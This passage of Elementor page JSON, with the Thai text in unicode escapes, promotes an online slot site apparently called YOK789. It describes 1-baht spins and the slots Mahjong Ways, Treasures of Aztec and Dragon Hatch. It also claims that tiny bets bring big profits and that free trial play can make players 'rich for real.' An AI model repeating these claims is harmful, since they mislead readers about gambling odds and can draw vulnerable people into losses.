\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1a\\u0e17\\u0e40\\u0e1a\\u0e32\\u0e41\\u0e15\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35<\\/b><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 